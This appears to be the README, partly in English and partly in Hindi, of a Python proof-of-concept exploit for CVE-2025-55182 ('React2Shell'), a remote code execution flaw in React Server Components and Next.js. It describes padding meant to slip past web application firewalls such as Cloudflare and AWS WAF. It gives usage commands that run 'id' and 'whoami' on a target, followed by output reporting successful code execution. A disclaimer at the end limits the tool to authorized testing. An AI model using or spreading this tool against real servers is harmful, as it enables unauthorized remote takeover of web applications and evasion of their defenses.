
Python PoC for CVE-2025-55182 (React2Shell) RCE in Next.js/React Server Components with dynamic WAF bypass padding for authorized security testing.
CVE-2025-55182 (उर्फ React2Shell) के लिए एक स्वच्छ, विश्वसनीय Python proof-of-concept शोषण, जो Next.js (App Router) और समान फ्रेमवर्क में उपयोग किए जाने वाले React Server Components में एक गंभीर रिमोट कोड निष्पादन भेद्यता है।
इस PoC में डायनेमिक WAF बाईपास पैडिंग शामिल है, जो सामान्य वेब एप्लिकेशन फ़ायरवॉल (Cloudflare, AWS WAF, आदि) से बचने के लिए है, जो बड़े multipart निकायों के गहन निरीक्षण को सीमित करते हैं।
requests लाइब्रेरीpip install requests
python poc.py https://vulnerable-target.com "id"
python poc.py https://vulnerable-target.com "whoami" 256
[*] Sending payload to https://vulnerable-target.com with 256KB padding...
[*] Command: id
[+] RCE Successful! Output:
uid=1000(node) gid=1000(node) groups=1000(node),4(adm),27(sudo)
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और अनुसंधान के लिए है।